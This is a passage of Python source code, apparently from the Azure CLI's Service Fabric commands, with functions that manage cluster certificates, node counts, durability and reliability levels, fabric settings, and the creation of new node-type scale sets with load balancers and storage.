certificate_uri = None
cert_thumbprint = None
output_file = None
if parameter_file is None:
vm_os = os_dic[vm_os]
reliability_level = _get_reliability_level(cluster_size)
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
certificate_uri = result[1]
cert_thumbprint = result[2]
output_file = result[3]
linux = None
if vm_os == '16.04-LTS':
linux = True
template = _modify_template(linux)
parameters = _set_parameters_for_default_template(cluster_location=location,
cluster_name=cluster_name,
admin_password=vm_password,
certificate_thumbprint=cert_thumbprint,
vault_id=vault_id,
certificate_id=certificate_uri,
reliability_level=reliability_level,
admin_name=vm_user_name,
cluster_size=cluster_size,
durability_level=DEFAULT_DURABILITY_LEVEL,
vm_sku=vm_sku,
os_type=vm_os,
linux=linux)
else:
parameters, output_file = _set_parameters_for_customize_template(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file)
vault_id = parameters[SOURCE_VAULT_VALUE]['value']
certificate_uri = parameters[CERTIFICATE_URL_VALUE]['value']
cert_thumbprint = parameters[CERTIFICATE_THUMBPRINT]['value']
template = get_file_json(template_file)
validate_and_deploy_arm_template(cmd, resource_group_name, template, parameters)
output_dict = {}
output_dict['vm_user_name'] = vm_user_name
output_dict['cluster'] = client.get(resource_group_name, cluster_name)
output_dict['certificate'] = {'certificate_file': output_file,
'vault_id': vault_id,
'certificate_identifier': certificate_uri,
'thumbprint': cert_thumbprint}
return output_dict
def _build_detailed_error(top_error, output_list):
if output_list:
output_list.append(' Inner Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
else:
output_list.append('Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
if top_error.details:
for error in top_error.details:
_build_detailed_error(error, output_list)
return output_list
def add_app_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
_add_cert_to_all_vmss(cli_ctx, resource_group_name, None, result[0], result[1])
return client.get(resource_group_name, cluster_name)
def add_client_cert(client,
resource_group_name,
cluster_name,
is_admin=False,
thumbprint=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
admin_client_thumbprints=None,
readonly_client_thumbprints=None,
client_certificate_common_names=None):
if thumbprint:
if certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names:
raise CLIError(
"--thumbprint can only specified alone or with --is-admin")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if admin_client_thumbprints or readonly_client_thumbprints:
if thumbprint or certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--admin-client-thumbprints\' and \'--readonly-client-thumbprints\' can be specified together")
if client_certificate_common_names:
if is_admin or thumbprint or certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints: # pylint: disable=too-many-boolean-expressions
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _add_thumbprint(cluster, is_admin, thumbprint):
remove = []
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove.append(t)
for t in remove:
cluster.client_certificate_thumbprints.remove(t)
cluster.client_certificate_thumbprints.append(
ClientCertificateThumbprint(is_admin, thumbprint))
def _add_common_name(cluster, is_admin, certificate_common_name, certificate_issuer_thumbprint):
remove = None
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
cluster.client_certificate_common_names.append(ClientCertificateCommonName(
is_admin, certificate_common_name, certificate_issuer_thumbprint))
return cluster.client_certificate_common_names
if thumbprint:
_add_thumbprint(cluster, is_admin, thumbprint)
if admin_client_thumbprints or readonly_client_thumbprints:
if admin_client_thumbprints:
for t in admin_client_thumbprints:
_add_thumbprint(cluster, True, t)
if readonly_client_thumbprints:
for t in readonly_client_thumbprints:
_add_thumbprint(cluster, False, t)
if certificate_common_name:
_add_common_name(cluster, is_admin, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name and 'isAdmin' in common_name:
cluster.client_certificate_common_names = _add_common_name(
cluster, common_name['isAdmin'], common_name['certificateCommonName'], common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_client_cert(client,
resource_group_name,
cluster_name,
thumbprints=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
client_certificate_common_names=None):
if thumbprints:
if certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names:
raise CLIError("--thumbprint can only specified alone")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprints or client_certificate_common_names:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if client_certificate_common_names:
if thumbprints or certificate_common_name or certificate_issuer_thumbprint:
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _remove_thumbprint(cluster, thumbprint):
remove = None
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_thumbprints.remove(remove)
return cluster.client_certificate_thumbprints
def _remove_common_name(cluster, certificate_common_name, certificate_issuer_thumbprint):
remove = None
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
return cluster.client_certificate_common_names
if isinstance(thumbprints, list) is False:
_remove_thumbprint(cluster, thumbprints)
if isinstance(thumbprints, list) is True:
for t in thumbprints:
cluster.client_certificate_thumbprints = _remove_thumbprint(
cluster, t)
if certificate_common_name:
_remove_common_name(cluster, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name:
cluster.client_certificate_common_names = _remove_common_name(cluster,
common_name['certificateCommonName'],
common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to add certificate")
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
secret_url = result[1]
thumbprint = result[2]
compute_client = compute_client_factory(cli_ctx)
primary_node_type = [n for n in cluster.node_types if n.is_primary is True][0]
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, primary_node_type.name)
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is None:
raise CLIError("Failed to find service fabric extension")
# add cert and start vmss update
_add_cert_to_all_vmss(cli_ctx, resource_group_name, cluster.cluster_id, vault_id, secret_url, is_cluster_cert=True, thumbprint=thumbprint)
# cluster update
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate.thumbprint_secondary = thumbprint
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_cert(client, resource_group_name, cluster_name, thumbprint):
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to remove certificate")
if cluster.certificate.thumbprint_secondary.lower() == thumbprint.lower():
cluster.certificate.thumbprint_secondary = None
else:
if cluster.certificate.thumbprint.lower() == thumbprint.lower():
cluster.certificate.thumbprint = cluster.certificate.thumbprint_secondary
cluster.certificate.thumbprint_secondary = None
else:
raise CLIError(
"Unable to find the certificate with the thumbprint {} in the cluster".format(thumbprint))
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate = cluster.certificate
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_add):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_add = int(number_of_nodes_to_add)
if number_of_nodes_to_add <= 0:
raise CLIError("--number-of-nodes-to-add must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if not node_types:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
vmss.sku.capacity = vmss.sku.capacity + number_of_nodes_to_add
# update vmss
vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
# update cluster
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_remove):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_remove = int(number_of_nodes_to_remove)
if number_of_nodes_to_remove <= 0:
raise CLIError("--number-of-nodes-to-remove must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if not node_types:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
reliability_required_instance_count = _get_target_instance(cluster.reliability_level)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
vmss.sku.capacity = vmss.sku.capacity - number_of_nodes_to_remove
if vmss.sku.capacity < reliability_required_instance_count:
raise CLIError("Can't delete node since current reliability level is {} requires at least {} nodes.".format(
cluster.reliability_level,
reliability_required_instance_count))
# update vmss
vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
# update cluster
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_durability(cmd, client, resource_group_name, cluster_name, node_type, durability_level):
cli_ctx = cmd.cli_ctx
# get cluster node type durability
cluster = client.get(resource_group_name, cluster_name)
node_type_refs = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if not node_type_refs:
raise CLIError("Failed to find the node type in the cluster.")
node_type_ref = node_type_refs[0]
curr_node_type_durability = node_type_ref.durability_level
# get vmss extension durability
compute_client = compute_client_factory(cli_ctx)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type)
fabric_ext_ref = _get_sf_vm_extension(vmss)
if fabric_ext_ref is None:
raise CLIError("Failed to find service fabric extension.")
curr_vmss_durability_level = fabric_ext_ref.settings['durabilityLevel']
# check upgrade
if curr_node_type_durability.lower() != curr_vmss_durability_level.lower():
logger.warning(
"The durability level is currently mismatched between the cluster ('%s') and the VM extension ('%s').",
curr_node_type_durability,
curr_vmss_durability_level)
# update cluster node type durability
if curr_node_type_durability.lower() != durability_level.lower():
node_type_ref.durability_level = durability_level
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
update_cluster_poll = client.update(resource_group_name, cluster_name, patch_request)
LongRunningOperation(cli_ctx)(update_cluster_poll)
# update vmss sf extension durability
if curr_vmss_durability_level.lower() != durability_level.lower():
fabric_ext_ref.settings['durabilityLevel'] = durability_level
fabric_ext_ref.settings['enableParallelJobs'] = True
vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
return client.get(resource_group_name, cluster_name)
def update_cluster_upgrade_type(client,
resource_group_name,
cluster_name,
upgrade_mode,
version=None):
if upgrade_mode.lower() != 'manual' and upgrade_mode.lower() != 'automatic':
raise CLIError(
'--upgrade-mode can either be \'manual\' or \'automatic\'')
cluster = client.get(resource_group_name, cluster_name)
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
if upgrade_mode.lower() == 'manual':
if version is None:
raise CLIError(
'When \'--upgrade-mode\' set to \'manual\', --version must be given')
patch_request.cluster_code_version = version
patch_request.upgrade_mode = upgrade_mode
return client.update(resource_group_name, cluster_name, patch_request)
def set_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
value=None,
settings_section_description=None):
def _set(setting_dict, section, parameter, value):
if section not in setting_dict:
setting_dict[section] = {}
setting_dict[section][parameter] = value
return setting_dict
if settings_section_description and (section or parameter or value):
raise CLIError(
'Only can use either \'--settings-section-description\' or \'--section\', \'--parameter\' and \'--value\' to set the settings')
if section or parameter or value:
if section is None or parameter is None or value is None:
raise CLIError(
'\'--section\' , \'--parameter\' and \'--value\' can not be None')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting and 'value' in setting:
setting_dict = _set(setting_dict, setting['section'],
setting['parameter'], setting['value'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _set(setting_dict, section, parameter, value)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
settings_section_description=None):
def _remove(setting_dict, section, parameter):
if section not in setting_dict:
raise CLIError(
"Can't find the section {} in the settings".format(section))
if parameter not in setting_dict[section]:
raise CLIError(
"Can't find the parameter {} in the settings".format(parameter))
del setting_dict[section][parameter]
return setting_dict
if settings_section_description and (section or parameter):
raise CLIError(
'Only can use either \'--settings-section-description\' or \'--section\' and \'--parameter \' to set the settings')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting:
setting_dict = _remove(setting_dict, setting['section'], setting['parameter'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _remove(setting_dict, section, parameter)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_reliability_level(cmd,
client,
resource_group_name,
cluster_name, reliability_level,
auto_add_node=False):
cli_ctx = cmd.cli_ctx
reliability_level = reliability_level.lower()
cluster = client.get(resource_group_name, cluster_name)
instance_now = _get_target_instance(cluster.reliability_level)
instance_target = _get_target_instance(reliability_level)
node_types = [n for n in cluster.node_types if n.is_primary]
if not node_types:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
compute_client = compute_client_factory(cli_ctx)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
if instance_target == instance_now:
return cluster
if instance_target > instance_now:
if vmss.sku.capacity < instance_target:
if auto_add_node is not True:
raise CLIError('Please use --auto_add_node to automatically increase the nodes. {} requires {} nodes, but currently there are {}'.
format(reliability_level, instance_target, vmss.sku.capacity))
vmss.sku.capacity = instance_target
vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(
node_types=cluster.node_types, reliability_level=reliability_level)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node_type(cmd,
client,
resource_group_name,
cluster_name,
node_type,
capacity,
vm_user_name,
vm_password,
vm_sku=DEFAULT_SKU,
vm_tier=DEFAULT_TIER,
durability_level=DEFAULT_DURABILITY_LEVEL):
if durability_level.lower() == 'gold':
if vm_sku.lower() != 'standard_d15_v2' and vm_sku.lower() != 'standard_g5':
raise CLIError(
'Only Standard_D15_v2 and Standard_G5 supports Gold durability, please specify --vm-sku to right value')
cluster = client.get(resource_group_name, cluster_name)
if any(n for n in cluster.node_types if n.name.lower() == node_type):
raise CLIError("node type {} already exists in the cluster".format(node_type))
_create_vmss(cmd, resource_group_name, cluster_name, cluster, node_type, durability_level, vm_password, vm_user_name, vm_sku, vm_tier, capacity)
_add_node_type_to_sfrp(cmd, client, resource_group_name, cluster_name, cluster, node_type, capacity, durability_level)
return client.get(resource_group_name, cluster_name)
def _add_node_type_to_sfrp(cmd, client, resource_group_name, cluster_name, cluster, node_type_name, capacity, durability_level):
cluster.node_types.append(NodeTypeDescription(name=node_type_name,
client_connection_endpoint_port=DEFAULT_CLIENT_CONNECTION_ENDPOINT,
http_gateway_endpoint_port=DEFAULT_HTTP_GATEWAY_ENDPOINT,
is_primary=False,
vm_instance_count=int(capacity),
durability_level=durability_level,
application_ports=EndpointRangeDescription(
start_port=DEFAULT_APPLICATION_START_PORT, end_port=DEFAULT_APPLICATION_END_PORT),
ephemeral_ports=EndpointRangeDescription(
start_port=DEFAULT_EPHEMERAL_START, end_port=DEFAULT_EPHEMERAL_END)))
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
poller = client.update(resource_group_name, cluster_name, patch_request)
LongRunningOperation(cmd.cli_ctx)(poller)
def _create_vmss(cmd, resource_group_name, cluster_name, cluster, node_type_name, durability_level, vm_password, vm_user_name, vm_sku, vm_tier, capacity):
cli_ctx = cmd.cli_ctx
subnet_name = "subnet_{}".format(1)
network_client = network_client_factory(cli_ctx)
location = _get_resource_group_by_name(cli_ctx, resource_group_name).location
virtual_network = list(
network_client.virtual_networks.list(resource_group_name))[0]
subnets = list(network_client.subnets.list(
resource_group_name, virtual_network.name))
address_prefix = None
index = None
for x in range(1, 255):
address_prefix = '10.0.{}.0/24'.format(x)
index = x
found = False
for s in subnets:
if address_prefix == s.address_prefix:
found = True
if subnet_name.lower() == s.name.lower():
subnet_name = "subnet_{}".format(x)
if found is False:
break
if address_prefix is None:
raise CLIError("Failed to generate the address prefix")
poller = network_client.subnets.begin_create_or_update(resource_group_name,
virtual_network.name,
subnet_name,
Subnet(address_prefix=address_prefix))
subnet = LongRunningOperation(cli_ctx)(poller)
public_address_name = 'LBIP-{}-{}{}'.format(
cluster_name.lower(), node_type_name.lower(), index)
dns_label = '{}-{}{}'.format(cluster_name.lower(),
node_type_name.lower(), index)
lb_name = 'LB-{}-{}{}'.format(cluster_name.lower(),
node_type_name.lower(), index)
if len(lb_name) >= 24:
lb_name = '{}{}'.format(lb_name[0:21], index)
poller = network_client.public_ip_addresses.begin_create_or_update(resource_group_name,
public_address_name,
PublicIPAddress(public_ip_allocation_method='Dynamic',
location=location,
dns_settings=PublicIPAddressDnsSettings(domain_name_label=dns_label)))
publicIp = LongRunningOperation(cli_ctx)(poller)
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cli_ctx)
new_load_balancer_id = '/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}'.format(
subscription_id, resource_group_name, lb_name)
backend_address_poll_name = "LoadBalancerBEAddressPool"
frontendip_configuration_name = "LoadBalancerIPConfig"
probe_name = "FabricGatewayProbe"
probe_http_name = "FabricHttpGatewayProbe"
inbound_nat_pools_name = "LoadBalancerBEAddressNatPool"
new_load_balancer = LoadBalancer(id=new_load_balancer_id,
location=location,
frontend_ip_configurations=[FrontendIPConfiguration(name=frontendip_configuration_name,
public_ip_address=PublicIPAddress(id=publicIp.id))],
backend_address_pools=[BackendAddressPool(
name=backend_address_poll_name)],
load_balancing_rules=[LoadBalancingRule(name='LBRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.
format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_TCP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_TCP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_name))),
LoadBalancingRule(name='LBHttpRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_HTTP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_HTTP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_http_name)))],
probes=[Probe(protocol='tcp',
name=probe_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_TCP_PORT),
Probe(protocol='tcp',
name=probe_http_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_HTTP_PORT)],
inbound_nat_pools=[InboundNatPool(protocol='tcp',
name=inbound_nat_pools_name,
backend_port=DEFAULT_BACKEND_PORT,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port_range_start=DEFAULT_FRONTEND_PORT_RANGE_START,
frontend_port_range_end=DEFAULT_FRONTEND_PORT_RANGE_END)])
poller = network_client.load_balancers.begin_create_or_update(
resource_group_name, lb_name, new_load_balancer)
LongRunningOperation(cli_ctx)(poller)
new_load_balancer = network_client.load_balancers.get(
resource_group_name, lb_name)
backend_address_pools = []
inbound_nat_pools = []
for p in new_load_balancer.backend_address_pools:
backend_address_pools.append(SubResource(id=p.id))
for p in new_load_balancer.inbound_nat_pools:
inbound_nat_pools.append(SubResource(id=p.id))
network_config_name = 'NIC-{}-{}'.format(node_type_name.lower(), node_type_name.lower())
if len(network_config_name) >= 24:
network_config_name = network_config_name[0:22]
ip_config_name = 'Nic-{}'.format(node_type_name.lower())
if len(ip_config_name) >= 24:
ip_config_name = network_config_name[0:22]
vm_network_profile = VirtualMachineScaleSetNetworkProfile(network_interface_configurations=[VirtualMachineScaleSetNetworkConfiguration(name=network_config_name,
primary=True,
ip_configurations=[VirtualMachineScaleSetIPConfiguration(name=ip_config_name,
load_balancer_backend_address_pools=backend_address_pools,
load_balancer_inbound_nat_pools=inbound_nat_pools,
subnet=ApiEntityReference(id=subnet.id))])])
compute_client = compute_client_factory(cli_ctx)
node_type_name_ref = cluster.node_types[0].name
vmss_reference = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type_name_ref)
def create_vhd(cli_ctx, resource_group_name, cluster_name, node_type, location):
storage_name = '{}{}'.format(cluster_name.lower(), node_type.lower())
name = ""
vhds = []
for n in storage_name:
if n.isalpha() or n.isdigit():
name += n
if len(name) >= 21:
break
for i in range(1, 6):
acc = create_storage_account(
cli_ctx, resource_group_name.lower(), '{}{}'.format(name, i), location)
vhds.append('{}{}'.format(acc[0].primary_endpoints.blob, 'vhd'))
return vhds
def create_storage_account(cli_ctx, resource_group_name, storage_name, location):
from azure.mgmt.storage.models import Sku, SkuName
storage_client = storage_client_factory(cli_ctx)
LongRunningOperation(cli_ctx)(storage_client.storage_accounts.create(resource_group_name,
storage_name,
StorageAccountCreateParameters(sku=Sku(name=SkuName.standard_lrs),
kind='storage',
location=location)))
acc_prop = storage_client.storage_accounts.get_properties(
resource_group_name, storage_name)
acc_keys = storage_client.storage_accounts.list_keys(
resource_group_name, storage_name)
return acc_prop, acc_keys
publisher = 'MicrosoftWindowsServer'
offer = 'WindowsServer'
version = 'latest'
sku = os_dic[DEFAULT_OS]
if cluster.vm_image.lower() == 'linux':
publisher = 'Canonical'
offer = 'UbuntuServer'
version = 'latest'
sku = os_dic['UbuntuServer1604']
storage_profile = VirtualMachineScaleSetStorageProfile(image_reference=ImageReference(publisher=publisher,
offer=offer,
sku=sku,
version=version),
os_disk=VirtualMachineScaleSetOSDisk(caching='ReadOnly',
create_option='FromImage',
name='vmssosdisk',
vhd_containers=create_vhd(cli_ctx, resource_group_name, cluster_name, node_type_name, location)))
os_profile = VirtualMachineScaleSetOSProfile(computer_name_prefix=node_type_name,
admin_password=vm_password,
admin_username=vm_user_name,
secrets=vmss_reference.virtual_machine_profile.os_profile.secrets)
diagnostics_storage_name = cluster.diagnostics_storage_account_config.storage_account_name
diagnostics_ext = None
fabric_ext = None
diagnostics_exts = [e for e in vmss_reference.virtual_machine_profile.extension_profile.extensions if e.type1.lower(
) == 'IaaSDiagnostics'.lower()]
if any(diagnostics_exts):
diagnostics_ext = diagnostics_exts[0]
diagnostics_account = diagnostics_ext.settings['StorageAccount']
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_account)
import json
json_data = json.loads(
'{"storageAccountName": "", "storageAccountKey": "", "storageAccountEndPoint": ""}')
json_data['storageAccountName'] = diagnostics_account
json_data['storageAccountKey'] = list_results.keys[0].value
json_data['storageAccountEndPoint'] = "https://core.windows.net/"
diagnostics_ext.protected_settings = json_data
fabric_exts = [e for e in vmss_reference.virtual_machine_profile.extension_profile.extensions if e.type1.lower(
) == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type1.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
if any(fabric_exts):
fabric_ext = fabric_exts[0]
if fabric_ext is None:
raise CLIError("No valid fabric extension found")
fabric_ext.settings['nodeTypeRef'] = node_type_name
fabric_ext.settings['durabilityLevel'] = durability_level
if 'nicPrefixOverride' not in fabric_ext.settings:
fabric_ext.settings['nicPrefixOverride'] = address_prefix
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_storage_name)
import json
json_data = json.loads(
'{"StorageAccountKey1": "", "StorageAccountKey2": ""}')
fabric_ext.protected_settings = json_data
fabric_ext.protected_settings['StorageAccountKey1'] = list_results.keys[0].value
fabric_ext.protected_settings['StorageAccountKey2'] = list_results.keys[1].value
extensions = [fabric_ext]
if diagnostics_ext:
extensions.append(diagnostics_ext)
vm_ext_profile = VirtualMachineScaleSetExtensionProfile(
extensions=extensions)
virtual_machine_scale_set_profile = VirtualMachineScaleSetVMProfile(extension_profile=vm_ext_profile,
os_profile=os_profile,
storage_profile=storage_profile,
network_profile=vm_network_profile)
poller = compute_client.virtual_machine_scale_sets.begin_create_or_update(resource_group_name,
node_type_name,
VirtualMachineScaleSet(location=location,
sku=ComputeSku(name=vm_sku, tier=vm_tier, capacity=capacity),
overprovision=False,
upgrade_policy=UpgradePolicy(mode=UpgradeMode.automatic),
virtual_machine_profile=virtual_machine_scale_set_profile))
LongRunningOperation(cli_ctx)(poller)
def _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster_id, node_type_name):
vmsses = list(compute_client.virtual_machine_scale_sets.list(resource_group_name))
for vmss in vmsses:
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is not None:
curr_cluster_id = _get_cluster_id_in_sf_extension(fabric_ext)
if curr_cluster_id.lower() == cluster_id.lower() and fabric_ext.settings["nodeTypeRef"].lower() == node_type_name.lower():
return vmss
raise CLIError("Failed to find vmss in resource group {} for cluster id {} and node type {}".format(resource_group_name, cluster_id, node_type_name))
def _verify_cert_function_parameter(certificate_file=None,
certificate_password=None,
vault_name=None, # pylint: disable=unused-argument
vault_resource_group_name=None, # pylint: disable=unused-argument
certificate_output_folder=None,
